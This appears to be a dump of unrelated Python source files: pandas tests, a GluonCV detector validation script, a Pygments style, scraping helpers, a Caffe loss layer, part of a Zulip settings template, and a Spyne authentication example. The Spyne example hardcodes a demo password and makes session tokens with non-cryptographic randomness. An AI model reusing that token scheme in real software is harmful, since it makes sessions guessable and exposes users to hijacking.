ser[:5] = np.nan\n ser[6:10] = 'foo'\n ser[20:30] = 'bar'\n\n # replace list with a single value\n rs = ser.replace([np.nan, 'foo', 'bar'], -1)\n\n self.assertTrue((rs[:5] == -1).all())\n self.assertTrue((rs[6:10] == -1).all())\n self.assertTrue((rs[20:30] == -1).all())\n self.assertTrue((isnull(ser[:5])).all())\n\n # replace with different values\n rs = ser.replace({np.nan: -1, 'foo': -2, 'bar': -3})\n\n self.assertTrue((rs[:5] == -1).all())\n self.assertTrue((rs[6:10] == -2).all())\n self.assertTrue((rs[20:30] == -3).all())\n self.assertTrue((isnull(ser[:5])).all())\n\n # replace with different values with 2 lists\n rs2 = ser.replace([np.nan, 'foo', 'bar'], [-1, -2, -3])\n assert_series_equal(rs, rs2)\n\n # replace inplace\n ser.replace([np.nan, 'foo', 'bar'], -1, inplace=True)\n self.assertTrue((ser[:5] == -1).all())\n self.assertTrue((ser[6:10] == -1).all())\n self.assertTrue((ser[20:30] == -1).all())\n\n def test_repeat(self):\n s = Series(np.random.randn(3), index=['a', 'b', 'c'])\n\n reps = s.repeat(5)\n exp = Series(s.values.repeat(5), index=s.index.values.repeat(5))\n assert_series_equal(reps, exp)\n\n to_rep = [2, 3, 4]\n reps = s.repeat(to_rep)\n exp = Series(s.values.repeat(to_rep),\n index=s.index.values.repeat(to_rep))\n assert_series_equal(reps, exp)\n\n def test_unique_data_ownership(self):\n # it works! #1807\n Series(Series([\"a\", \"c\", \"b\"]).unique()).sort()\n\nif __name__ == '__main__':\n nose.runmodule(argv=[__file__, '-vvs', '-x', '--pdb', '--pdb-failure'],\n exit=False)\n"} {"ext": "py", "sha": "1a2fc5fef9537c0af5cbc7caa7253d9e1dc9a7cc", "content": "import os\nfrom os import path\nfrom pathlib import Path\nfrom shutil import rmtree\nfrom typing import Union\n\nfrom pyspark.sql.types import DataType\nfrom pyspark.sql.types import StructType\nfrom spark_fhir_schemas.r4.complex_types.address import AddressSchema\nfrom spark_fhir_schemas.r4.resources.explanationofbenefit import (\n ExplanationOfBenefitSchema,\n)\nfrom spark_fhir_schemas.r4.resources.patient import PatientSchema\n\n\ndef test_simple() -> None:\n data_dir: Path = Path(__file__).parent.joinpath(\"./\")\n temp_folder = data_dir.joinpath(\"./temp\")\n if path.isdir(temp_folder):\n rmtree(temp_folder)\n\n os.mkdir(temp_folder)\n\n schema: Union[StructType, DataType] = PatientSchema.get_schema()\n assert isinstance(schema, StructType)\n\n # print(schema)\n print(\"------- Patient --------\")\n print(schema.json())\n\n with open(temp_folder.joinpath(\"patient_schema.json\"), \"w+\") as file:\n file.write(schema.json())\n\n print(\"------- Address --------\")\n schema = AddressSchema.get_schema()\n print(schema.json())\n with open(temp_folder.joinpath(\"address_schema.json\"), \"w+\") as file:\n file.write(schema.json())\n\n print(\"------- ExplanationOfBenefitSchema --------\")\n schema = ExplanationOfBenefitSchema.get_schema()\n print(schema.json())\n # noinspection SpellCheckingInspection\n with open(temp_folder.joinpath(\"explanationofbenefit_schema.json\"), \"w\") as file:\n file.write(schema.json())\n\n assert 1 == 1\n"} {"ext": "py", "sha": "1a2fc664e4da7f455d63942dd2554fa8b531bffc", "content": "from __future__ import division\nfrom __future__ import print_function\n\nimport os\n# disable autotune\nos.environ['MXNET_CUDNN_AUTOTUNE_DEFAULT'] = '0'\nimport argparse\nimport glob\nimport logging\nlogging.basicConfig(level=logging.INFO)\nimport time\nimport numpy as np\nimport mxnet as mx\nfrom tqdm import tqdm\nfrom mxnet import nd\nfrom mxnet import gluon\nimport gluoncv as gcv\ngcv.utils.check_version('0.6.0')\nfrom gluoncv import data as gdata\nfrom gluoncv.data import batchify\nfrom gluoncv.data.transforms.presets.rcnn import FasterRCNNDefaultValTransform\nfrom gluoncv.utils.metrics.voc_detection import VOC07MApMetric\nfrom gluoncv.utils.metrics.coco_detection import COCODetectionMetric\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Validate Faster-RCNN networks.')\n parser.add_argument('--network', type=str, default='resnet50_v1b',\n help=\"Base feature extraction network name\")\n parser.add_argument('--dataset', type=str, default='voc',\n help='Training dataset.')\n parser.add_argument('--num-workers', '-j', dest='num_workers', type=int,\n default=4, help='Number of data workers')\n parser.add_argument('--gpus', type=str, default='0',\n help='Training with GPUs, you can specify 1,3 for example.')\n parser.add_argument('--pretrained', type=str, default='True',\n help='Load weights from previously saved parameters.')\n parser.add_argument('--save-prefix', type=str, default='',\n help='Saving parameter prefix')\n parser.add_argument('--save-json', action='store_true',\n help='Save coco output json')\n parser.add_argument('--eval-all', action='store_true',\n help='Eval all models begins with save prefix. Use with pretrained.')\n parser.add_argument('--norm-layer', type=str, default=None,\n help='Type of normalization layer to use. '\n 'If set to None, backbone normalization layer will be fixed,'\n ' and no normalization layer will be used. '\n 'Currently supports \\'bn\\', and None, default is None')\n parser.add_argument('--use-fpn', action='store_true',\n help='Whether to use feature pyramid network.')\n args = parser.parse_args()\n return args\n\ndef get_dataset(dataset, args):\n if dataset.lower() == 'voc':\n val_dataset = gdata.VOCDetection(\n splits=[(2007, 'test')])\n val_metric = VOC07MApMetric(iou_thresh=0.5, class_names=val_dataset.classes)\n elif dataset.lower() == 'coco':\n val_dataset = gdata.COCODetection(splits='instances_val2017', skip_empty=False)\n val_metric = COCODetectionMetric(val_dataset, args.save_prefix + '_eval',\n cleanup=not args.save_json)\n else:\n raise NotImplementedError('Dataset: {} not implemented.'.format(dataset))\n return val_dataset, val_metric\n\ndef get_dataloader(net, val_dataset, batch_size, num_workers):\n \"\"\"Get dataloader.\"\"\"\n val_bfn = batchify.Tuple(*[batchify.Append() for _ in range(3)])\n val_loader = mx.gluon.data.DataLoader(\n val_dataset.transform(FasterRCNNDefaultValTransform(net.short, net.max_size)),\n batch_size, False, batchify_fn=val_bfn, last_batch='keep', num_workers=num_workers)\n return val_loader\n\ndef split_and_load(batch, ctx_list):\n \"\"\"Split data to 1 batch each device.\"\"\"\n num_ctx = len(ctx_list)\n new_batch = []\n for i, data in enumerate(batch):\n new_data = [x.as_in_context(ctx) for x, ctx in zip(data, ctx_list)]\n new_batch.append(new_data)\n return new_batch\n\ndef validate(net, val_data, ctx, eval_metric, size):\n \"\"\"Test on validation dataset.\"\"\"\n clipper = gcv.nn.bbox.BBoxClipToImage()\n eval_metric.reset()\n net.hybridize(static_alloc=True)\n with tqdm(total=size) as pbar:\n for ib, batch in enumerate(val_data):\n batch = split_and_load(batch, ctx_list=ctx)\n det_bboxes = []\n det_ids = []\n det_scores = []\n gt_bboxes = []\n gt_ids = []\n gt_difficults = []\n for x, y, im_scale in zip(*batch):\n # get prediction results\n ids, scores, bboxes = net(x)\n det_ids.append(ids)\n det_scores.append(scores)\n # clip to image size\n det_bboxes.append(clipper(bboxes, x))\n # rescale to original resolution\n im_scale = im_scale.reshape((-1)).asscalar()\n det_bboxes[-1] *= im_scale\n # split ground truths\n gt_ids.append(y.slice_axis(axis=-1, begin=4, end=5))\n gt_bboxes.append(y.slice_axis(axis=-1, begin=0, end=4))\n gt_bboxes[-1] *= im_scale\n gt_difficults.append(y.slice_axis(axis=-1, begin=5, end=6) if y.shape[-1] > 5 else None)\n # update metric\n for det_bbox, det_id, det_score, gt_bbox, gt_id, gt_diff in zip(det_bboxes, det_ids, det_scores, gt_bboxes, gt_ids, gt_difficults):\n eval_metric.update(det_bbox, det_id, det_score, gt_bbox, gt_id, gt_diff)\n pbar.update(len(ctx))\n return eval_metric.get()\n\nif __name__ == '__main__':\n args = parse_args()\n\n # contexts\n ctx = [mx.gpu(int(i)) for i in args.gpus.split(',') if i.strip()]\n ctx = ctx if ctx else [mx.cpu()]\n args.batch_size = len(ctx) # 1 batch per device\n\n # network\n kwargs = {}\n module_list = []\n if args.use_fpn:\n module_list.append('fpn')\n if args.norm_layer is not None:\n module_list.append(args.norm_layer)\n if args.norm_layer == 'bn':\n kwargs['num_devices'] = len(args.gpus.split(','))\n net_name = '_'.join(('faster_rcnn', *module_list, args.network, args.dataset))\n args.save_prefix += net_name\n if args.pretrained.lower() in ['true', '1', 'yes', 't']:\n net = gcv.model_zoo.get_model(net_name, pretrained=True, **kwargs)\n else:\n net = gcv.model_zoo.get_model(net_name, pretrained=False, **kwargs)\n net.load_parameters(args.pretrained.strip(), cast_dtype=True)\n net.collect_params().reset_ctx(ctx)\n\n # validation data\n val_dataset, eval_metric = get_dataset(args.dataset, args)\n val_data = get_dataloader(\n net, val_dataset, args.batch_size, args.num_workers)\n\n # validation\n if not args.eval_all:\n names, values = validate(net, val_data, ctx, eval_metric, len(val_dataset))\n for k, v in zip(names, values):\n print(k, v)\n else:\n saved_models = glob.glob(args.save_prefix + '*.params')\n for epoch, saved_model in enumerate(sorted(saved_models)):\n print('[Epoch {}] Validating from {}'.format(epoch, saved_model))\n net.load_parameters(saved_model)\n net.collect_params().reset_ctx(ctx)\n map_name, mean_ap = validate(net, val_data, ctx, eval_metric, len(val_dataset))\n val_msg = '\\n'.join(['{}={}'.format(k, v) for k, v in zip(map_name, mean_ap)])\n print('[Epoch {}] Validation: \\n{}'.format(epoch, val_msg))\n current_map = float(mean_ap[-1])\n with open(args.save_prefix+'_best_map.log', 'a') as f:\n f.write('\\n{:04d}:\\t{:.4f}'.format(epoch, current_map))\n"} {"ext": "py", "sha": "1a2fc6a45177c4fb910e60a72147540646329b18", "content": "# -*- coding: utf-8 -*-\n\"\"\"\n pygments.styles.rrt\n ~~~~~~~~~~~~~~~~~~~\n\n pygments \"rrt\" theme, based on Zap and Emacs defaults.\n\n :copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.\n :license: BSD, see LICENSE for details.\n\"\"\"\n\nfrom pygments.style import Style\nfrom pygments.token import Comment, Name, Keyword, String\n\n\nclass RrtStyle(Style):\n \"\"\"\n Minimalistic \"rrt\" theme, based on Zap and Emacs defaults.\n \"\"\"\n\n background_color = '#000000'\n highlight_color = '#0000ff'\n\n styles = {\n Comment: '#00ff00',\n Name.Function: '#ffff00',\n Name.Variable: '#eedd82',\n Name.Constant: '#7fffd4',\n Keyword: '#ff0000',\n Comment.Preproc: '#e5e5e5',\n String: '#87ceeb',\n Keyword.Type: '#ee82ee',\n }\n"} {"ext": "py", "sha": "1a2fc6d60a0e0c27df3ace927b3016c87b619670", "content": "from scraping.funtion import html_convert_python\n\ndef get_data_page_locate(url):\n\n soup = html_convert_python( url )\n data = []\n\n for row in soup.find(\"ul\", {\"id\": \"postcode-list\"}).find_all(\"li\"):\n\n url = row.find('a').attrs['href']\n data.append(url)\n\n return data\n\n\ndef get_data_page_region(url):\n\n soup = html_convert_python( url )\n data = []\n\n for row in soup.find_all(\"div\", {\"class\": \"col-md-3 col-xs-4\"}):\n\n url = row.a.get('href')\n print(url)\n data.append(url)\n\n return data\n\n\ndef get_data_page_postcode(url):\n\n soup = html_convert_python( url )\n data = []\n\n for row in soup.find_all(\"div\", {\"class\": \"col-md-3 col-xs-12\"}):\n\n url = row.a.string\n print(url)\n data.append(url)\n\n return data\n"} {"ext": "py", "sha": "1a2fc6f2e7b702b78f689e41f3dc9f0edb25c1c4", "content": "#!/usr/bin/env python\n#encoding: utf8\n#\n# Copyright © Burak Arslan ,\n# Arskom Ltd. http://www.arskom.com.tr\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# 3. Neither the name of the owner nor the names of its contributors may be\n# used to endorse or promote products derived from this software without\n# specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER BE LIABLE FOR ANY DIRECT,\n# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY\n# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\n# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\nimport logging\nimport random\nimport sys\nimport base64\n\nfrom Cookie import SimpleCookie\n\n# bcrypt seems to be among the latest consensus around cryptograpic circles on\n# storing passwords.\n# You need the package from http://code.google.com/p/py-bcrypt/\n# You can install it by running easy_install py-bcrypt.\ntry:\n import bcrypt\nexcept ImportError:\n print('easy_install --user py-bcrypt to get it.')\n raise\n\nfrom spyne.application import Application\nfrom spyne.decorator import rpc\nfrom spyne.error import ResourceNotFoundError\nfrom spyne.model.complex import ComplexModel\nfrom spyne.model.fault import Fault\nfrom spyne.model.primitive import Mandatory\nfrom spyne.model.primitive import String\nfrom spyne.protocol.soap import Soap11\nfrom spyne.server.wsgi import WsgiApplication\nfrom spyne.service import ServiceBase\n\nclass PublicKeyError(ResourceNotFoundError):\n __namespace__ = 'spyne.examples.authentication'\n\n def __init__(self, value):\n Fault.__init__(self,\n faultcode='Client.KeyError',\n faultstring='Value %r not found' % value\n )\n\n\nclass AuthenticationError(Fault):\n __namespace__ = 'spyne.examples.authentication'\n\n def __init__(self, user_name):\n # TODO: self.transport.http.resp_code = HTTP_401\n\n Fault.__init__(self,\n faultcode='Client.AuthenticationError',\n faultstring='Invalid authentication request for %r' % user_name\n )\n\n\nclass AuthorizationError(Fault):\n __namespace__ = 'spyne.examples.authentication'\n\n def __init__(self):\n # TODO: self.transport.http.resp_code = HTTP_401\n\n Fault.__init__(self,\n faultcode='Client.AuthorizationError',\n faultstring='You are not authorized to access this resource.'\n )\n\nclass UnauthenticatedError(Fault):\n __namespace__ = 'spyne.examples.authentication'\n\n def __init__(self):\n Fault.__init__(self,\n faultcode='Client.UnauthenticatedError',\n faultstring='This resource can only be accessed after authentication.'\n )\n\nclass SpyneDict(dict):\n def __getitem__(self, key):\n try:\n return dict.__getitem__(self, key)\n except KeyError:\n raise PublicKeyError(key)\n\n\nclass Preferences(ComplexModel):\n __namespace__ = 'spyne.examples.authentication'\n\n language = String(max_len=2)\n time_zone = String\n\n\nuser_db = {\n 'neo': bcrypt.hashpw('Wh1teR@bbit', bcrypt.gensalt()),\n}\n\nsession_db = set()\n\npreferences_db = SpyneDict({\n 'neo': Preferences(language='en', time_zone='Underground/Zion'),\n 'smith': Preferences(language='xx', time_zone='Matrix/Core'),\n})\n\n\nclass UserService(ServiceBase):\n __tns__ = 'spyne.examples.authentication'\n\n @rpc(Mandatory.String, Mandatory.String, _returns=None,\n _throws=AuthenticationError)\n def authenticate(ctx, user_name, password):\n password_hash = user_db.get(user_name, None)\n\n if password_hash is None:\n raise AuthenticationError(user_name)\n\n if bcrypt.hashpw(password, password_hash) != password_hash:\n raise AuthenticationError(user_name)\n\n session_id = (user_name, '%x' % random.randint(1<<128, (1<<132)-1))\n session_db.add(session_id)\n\n cookie = SimpleCookie()\n cookie[\"session-id\"] = base64.urlsafe_b64encode(str(session_id[0]) + \"\\0\" + str(session_id[1]))\n cookie[\"session-id\"][\"max-age\"] = 3600\n header_name, header_value = cookie.output().split(\":\", 1)\n ctx.transport.resp_headers[header_name] = header_value.strip()\n from pprint import pprint\n pprint(ctx.transport.resp_headers)\n\n\n @rpc(Mandatory.String, _throws=PublicKeyError, _returns=Preferences)\n def get_preferences(ctx, user_name):\n # Only allow access to the users own preferences.\n if user_name != ctx.udc:\n raise AuthorizationError()\n\n retval = preferences_db[user_name]\n\n return retval\n\ndef _on_method_call(ctx):\n if ctx.descriptor.name == \"authenticate\":\n # No checking of session cookie for call to authenticate\n return\n\n cookie = SimpleCookie()\n http_cookie = ctx.transport.req_env.get(\"HTTP_COOKIE\")\n if http_cookie:\n cookie.load(http_cookie)\n if \"session-id\" not in cookie:\n raise UnauthenticatedError()\n session_cookie = cookie[\"session-id\"].value\n session_id = tuple(base64.urlsafe_b64decode(session_cookie).split(\"\\0\", 1))\n if not session_id in session_db:\n raise AuthenticationError(session_id[0])\n ctx.udc = session_id[0] # user name\n\n\nUserService.event_manager.add_listener('method_call', _on_method_call)\n\nif __name__=='__main__':\n from spyne.util.wsgi_wrapper import run_twisted\n\n logging.basicConfig(level=logging.DEBUG)\n logging.getLogger('spyne.protocol.xml').setLevel(logging.DEBUG)\n logging.getLogger('twisted').setLevel(logging.DEBUG)\n\n application = Application([UserService],\n tns='spyne.examples.authentication',\n in_protocol=Soap11(validator='lxml'),\n out_protocol=Soap11()\n )\n\n twisted_apps = [\n (WsgiApplication(application), 'app'),\n ]\n\n sys.exit(run_twisted(twisted_apps, 7789))\n"} {"ext": "py", "sha": "1a2fc7ee57cb4ab1366ee1f2bd9e223a48a4f673", "content": "__author__ = 'dereyly'\nimport sys\n#sys.path.append('/home/dereyly/progs/caffe_cudnn33/python_33')\n#sys.path.append('/home/dereyly/progs/caffe-master-triplet/python')\nimport caffe\nimport numpy as np\n\n'''\nlayer {\n name: 'rcls_lost_my'\n type: 'Python'\n bottom: 'feats'\n bottom: 'labels'\n top: 'cls_lost_my'\n python_param {\n module: 'fast_rcnn.skip_softmax_loss'\n layer: 'SoftmaxLossLayer'\n #param_str: \"{'ratios': [0.5, 1, 2], 'scales': [2, 4, 8, 16, 32]}\"\n }\n loss_weight: 1\n}\n'''\n\ndef softmax(x):\n \"\"\"Compute softmax values for each sets of scores in x.\"\"\"\n sf = np.exp(x)\n sum_sf=np.sum(sf, axis=1)\n for i in range(x.shape[0]):\n sf[i]/=sum_sf[i]\n return sf\n\nclass SoftmaxLossLayer(caffe.Layer):\n\n def setup(self, bottom, top):\n # check input pair\n if len(bottom) != 2:\n raise Exception(\"Need two inputs to compute distance.\")\n # DBG\n self.count = 0\n self.skip_count = 0\n top[0].reshape(1)\n\n def reshape(self, bottom, top):\n # check input dimensions match\n # difference is shape of inputs\n sz=bottom[0].data.shape\n self.batch_sz=sz[0]\n self.diff = np.zeros((sz[0],sz[1]),dtype=np.float32)\n self.lbl_gt=np.zeros((sz[0],sz[1]),dtype=np.float32)\n # loss output is scalar\n\n\n\n #top[1].reshape(self.batch_sz)\n\n def forward(self, bottom, top):\n self.count+=1\n sz=bottom[0].data.shape\n self.lbl_gt=np.zeros((sz[0],sz[1]),dtype=np.float32)\n lbl_idx=bottom[1].data\n lbl_idx=lbl_idx.astype(dtype= int)\n for i in range(self.batch_sz):\n self.lbl_gt[i,lbl_idx[i]]=1\n soft_max=softmax(bottom[0].data)\n #loss = -self.lbl_gt*np.log(np.maximum(soft_max,np.finfo(np.float32).eps))\n\n loss=0\n for i in range(self.batch_sz):\n loss -= np.log(np.maximum(soft_max[i][lbl_idx[i]],np.finfo(np.float32).eps))\n\n #loss2=-np.log(soft_max)\n #for i in range(self.batch_sz):\n # loss[i,lbl_idx[i]]=0\n #print bottom[1].data.shape\n self.diff[...] = soft_max-self.lbl_gt\n\n for i in range(self.batch_sz):\n coeff=soft_max[i,lbl_idx[i]]\n self.diff[i]*=coeff\n self.skip_count+=coeff\n if self.count%100==0:\n print('-- skip count -- ',self.skip_count/(100.0*self.batch_sz))\n self.skip_count=0\n top[0].data[...] = np.sum(loss) / bottom[0].num\n #top[1].data[...] = loss\n\n def backward(self, top, propagate_down, bottom):\n #pass\n bottom[0].diff[...] = self.diff / bottom[0].num\n\n"} {"ext": "py", "sha": "1a2fc822be9317ed37f6e3aa7339504f9dd0a7a2", "content": "from typing import Optional, Tuple\n\n################################################################\n# Zulip Server settings.\n#\n# This file controls settings that affect the whole Zulip server.\n# See our documentation at:\n# https://zulip.readthedocs.io/en/latest/production/settings.html\n#\n# For developer documentation on the Zulip settings system, see:\n# https://zulip.readthedocs.io/en/latest/subsystems/settings.html\n#\n# Remember to restart the server after making changes here!\n# su zulip -c /home/zulip/deployments/current/scripts/restart-server\n\n\n################################\n# Mandatory settings.\n#\n# These settings MUST be set in production. In a development environment,\n# sensible default values will be used.\n\n# The email address for the person or team who maintains the Zulip\n# installation. Note that this is a public-facing email address; it may\n# appear on 404 pages, is used as the sender's address for many automated\n# emails, and is advertised as a support address. An email address like\n# support@example.com is totally reasonable, as is admin@example.com.\n# Do not put a display name; e.g. 'support@example.com', not\n# 'Zulip Support '.\nZULIP_ADMINISTRATOR = 'zulip-admin@example.com'\n\n# The user-accessible Zulip hostname for this installation, e.g.\n# zulip.example.com. This should match what users will put in their\n# web browser. If you want to allow multiple hostnames, add the rest\n# to ALLOWED_HOSTS.\n#\n# If you need to access the server on a specific port, you should set\n# EXTERNAL_HOST to e.g. zulip.example.com:1234 here.\nEXTERNAL_HOST = 'zulip.example.com'\n\n# Alternative hostnames. A comma-separated list of strings\n# representing the host/domain names that your users can enter in\n# their browsers to access Zulip. This is a security measure; for\n# details, see the Django documentation:\n# https://docs.djangoproject.com/en/1.11/ref/settings/#allowed-hosts\n#\n# Zulip automatically adds to this list 'localhost', '127.0.0.1', and\n# patterns representing EXTERNAL_HOST and subdomains of it. If you are\n# accessing your server by other hostnames, list them here.\n#\n# Note that these should just be hostnames, without port numbers.\n#ALLOWED_HOSTS = ['zulip-alias.example.com', '192.0.2.1']\n\n# If EXTERNAL_HOST is not a valid domain name (e.g. an IP address),\n# set FAKE_EMAIL_DOMAIN below to a domain that Zulip can use when\n# generating (fake) email addresses for bots, dummy users, etc.\n#FAKE_EMAIL_DOMAIN = 'fake-domain.example.com'\n\n\n################\n# Outgoing email (SMTP) settings.\n#\n# Zulip needs to be able to send email (that is, use SMTP) so it can\n# confirm new users' email addresses and send notifications.\n#\n# If you don't already have an SMTP provider, free ones are available.\n#\n# For more details, including a list of free SMTP providers and\n# advice for troubleshooting, see the Zulip documentation:\n# https://zulip.readthedocs.io/en/latest/production/email.html\n\n# EMAIL_HOST and EMAIL_HOST_USER are generally required.\n#EMAIL_HOST = 'smtp.example.com'\n#EMAIL_HOST_USER = ''\n\n# Passwords and secrets are not stored in this file. The password\n# for user EMAIL_HOST_USER goes in `/etc/zulip/zulip-secrets.conf`.\n# In that file, set `email_password`. For example:\n# email_password = abcd1234\n\n# EMAIL_USE_TLS and EMAIL_PORT are required for most SMTP providers.\n#EMAIL_USE_TLS = True\n#EMAIL_PORT = 587\n\n# The noreply address to be used as the sender for certain generated\n# emails. Messages sent to this address could contain sensitive user\n# data and should not be delivered anywhere. The default is\n# e.g. noreply-{random_token}@zulip.example.com (if EXTERNAL_HOST is\n# zulip.example.com). There are potential security issues if you set\n# ADD_TOKENS_TO_NOREPLY_ADDRESS=False to remove the token; see\n# https://zulip.readthedocs.io/en/latest/production/email.html for details.\n#ADD_TOKENS_TO_NOREPLY_ADDRESS = True\n#TOKENIZED_NOREPLY_EMAIL_ADDRESS = \"noreply-{token}@example.com\"\n# NOREPLY_EMAIL_ADDRESS is the sender for noreply emails that don't\n# contain confirmation links (where the security problem fixed by\n# ADD_TOKENS_TO_NOREPLY_ADDRESS does not exist), as well as for\n# confirmation emails when ADD_TOKENS_TO_NOREPLY_ADDRESS=False.\n#NOREPLY_EMAIL_ADDRESS = 'noreply@example.com'\n\n# Many countries and bulk mailers require certain types of email to display\n# a physical mailing address to comply with anti-spam legislation.\n# Non-commercial and non-public-facing installations are unlikely to need\n# this setting.\n# The address should have no newlines.\n#PHYSICAL_ADDRESS = ''\n\n\n################\n# Authentication settings.\n\n# Enable at least one of the following authentication backends.\n# See https://zulip.readthedocs.io/en/latest/production/authentication-methods.html\n# for documentation on our authentication backends.\n#\n# The install process requires EmailAuthBackend (the default) to be\n# enabled. If you want to disable it, do so after creating the\n# initial realm and user.\nAUTHENTICATION_BACKENDS = (\n 'zproject.backends.EmailAuthBackend', # Email and password; just requires SMTP setup\n # 'zproject.backends.GoogleAuthBackend', # Google auth, setup below\n # 'zproject.backends.GitHubAuthBackend', # GitHub auth, setup below\n # 'zproject.backends.AzureADAuthBackend', # Microsoft Azure Active Directory auth, setup below\n # 'zproject.backends.SAMLAuthBackend', # SAML, setup below\n # 'zproject.backends.ZulipLDAPAuthBackend', # LDAP, setup below\n # 'zproject.backends.ZulipRemoteUserBackend', # Local SSO, setup docs on readthedocs\n) # type: Tuple[str, ...]\n\n########\n# Google OAuth.\n#\n# To set up Google authentication, you'll need to do the following:\n#\n# (1) Visit https://console.developers.google.com/ , navigate to\n# \"APIs & Services\" > \"Credentials\", and create a \"Project\" which will\n# correspond to your Zulip instance.\n#\n# (2) Navigate to \"APIs & services\" > \"Library\", and find the\n# \"Identity Toolkit API\". Choose \"Enable\".\n#\n# (3) Return to \"Credentials\", and select \"Create credentials\".\n# Choose \"OAuth client ID\", and follow prompts to create a consent\n# screen. Fill in \"Authorized redirect URIs\" with a value like\n# https://zulip.example.com/accounts/login/google/done/\n# based on your value for EXTERNAL_HOST.\n#\n# (4) You should get a client ID and a client secret. Copy them.\n# Use the client ID as `SOCIAL_AUTH_GOOGLE_KEY` here, and put the\n# client secret in zulip-secrets.conf as `social_auth_google_secret`.\n#SOCIAL_AUTH_GOOGLE_KEY = \n\n########\n# GitHub OAuth.\n#\n# To set up GitHub authentication, you'll need to do the following:\n#\n# (1) Register an OAuth2 application with GitHub at one of:\n# https://github.com/settings/developers\n# https://github.com/organizations/ORGNAME/settings/developers\n# Fill in \"Callback URL\" with a value like\n# https://zulip.example.com/complete/github/ as\n# based on your values for EXTERNAL_HOST and SOCIAL_AUTH_SUBDOMAIN.\n#\n# (2) You should get a page with settings for your new application,\n# showing a client ID and a client secret. Use the client ID as\n# `SOCIAL_AUTH_GITHUB_KEY` here, and put the client secret in\n# zulip-secrets.conf as `social_auth_github_secret`.\n#SOCIAL_AUTH_GITHUB_KEY = \n\n# (3) Optionally, you can configure the GitHub integration to only\n# allow members of a particular GitHub team or organization to log\n# into your Zulip server through GitHub authentication. To enable\n# this, set one of the two parameters below:\n#SOCIAL_AUTH_GITHUB_TEAM_ID = \n#SOCIAL_AUTH_GITHUB_ORG_NAME = \n\n# (4) If you are serving multiple Zulip organizations on different\n# subdomains, you need to set SOCIAL_AUTH_SUBDOMAIN. You can set it\n# to any subdomain on which you do not plan to host a Zulip\n# organization. The default recommendation, `auth`, is a reserved\n# subdomain; if you're using this setting, the \"Callback URL\" should be e.g.:\n# https://auth.zulip.example.com/complete/github/\n#\n# If you end up using a subdomain other then the default\n# recommendation, you must also set the 'ROOT_SUBDOMAIN_ALIASES' list\n# to include this subdomain.\n#\n#SOCIAL_AUTH_SUBDOMAIN = 'auth'\n\n########\n# SAML Authentication\n#\n# For SAML authentication, you will need to configure the settings\n# below using information from your SAML Identity Provider, as\n# explained in:\n#\n# https://zulip.readthedocs.io/en/latest/production/authentication-methods.html#saml\n#\n# You will need to modify these SAML settings:\nSOCIAL_AUTH_SAML_ORG_INFO = {\n \"en-US\": {\n \"displayname\": \"Example, Inc. Zulip\",\n \"name\": \"zulip\",\n \"url\": \"%s%s\" % ('https://', EXTERNAL_HOST),\n }\n}\nSOCIAL_AUTH_SAML_ENABLED_IDPS = {\n # The fields are explained in detail here:\n # https://python-social-auth-docs.readthedocs.io/en/latest/backends/saml.html\n \"idp_name\": {\n # Configure entity_id and url according to information provided to you by your IdP:\n \"entity_id\": \"https://idp.testshib.org/idp/shibboleth\",\n \"url\": \"https://idp.testshib.org/idp/profile/SAML2/Redirect/SSO\",\n # The part below corresponds to what's likely referred to as something like\n # \"Attribute Statements\" (with Okta as your IdP) or \"Attribute Mapping\" (with G Suite).\n # The names on the right side need to correspond to the names under which\n # the IdP will send the user attributes. With these defaults, it's expected\n # that the user's email will be sent with the \"email\" attribute name,\n # the first name and the last name with the \"first_name\", \"last_name\" attribute names.\n \"attr_user_permanent_id\": \"email\",\n \"attr_first_name\": \"first_name\",\n \"attr_last_name\": \"last_name\",\n \"attr_username\": \"email\",\n \"attr_email\": \"email\",\n # The \"x509cert\" attribute is automatically read from\n # /etc/zulip/saml/idps/{idp_name}.crt; don't specify it here.\n\n # Optionally, you can edit display_name and display_icon\n # settings below to change the name and icon that will show on\n # the login button.\n \"display_name\": \"SAML\",\n # Path to a square image file containing a logo to appear at\n # the left end of the login/register buttons for this IDP.\n # The default of None results in a text-only button.\n # \"display_icon\": \"/path/to/icon.png\",\n }\n}\n\nSOCIAL_AUTH_SAML_SECURITY_CONFIG = {\n # If you've set up the optional private and public server keys,\n # set this to True to enable signing of SAMLRequests using the\n # private key.\n \"authnRequestsSigned\": False,\n}\n\n# These SAML settings you likely won't need to modify.\nSOCIAL_AUTH_SAML_SP_ENTITY_ID = 'https://' + EXTERNAL_HOST\nSOCIAL_AUTH_SAML_TECHNICAL_CONTACT = {\n \"givenName\": \"Technical team\",\n \"emailAddress\": ZULIP_ADMINISTRATOR,\n}\nSOCIAL_AUTH_SAML_SUPPORT_CONTACT = {\n \"givenName\": \"Support team\",\n \"emailAddress\": ZULIP_ADMINISTRATOR,\n}\n\n########\n# Azure Active Directory OAuth.\n#\n# To set up Microsoft Azure AD authentication, you'll need to do the following:\n#\n# (1) Register an OAuth2 application with Microsoft at:\n# https://apps.dev.microsoft.com\n# Generate a new password under Application Secrets\n# Generate a new platform (web) under Platforms. For Redirect URL, enter:\n# https://zulip.example.com/complete/azuread-oauth2/\n# Add User.Read permission under Microsoft Graph 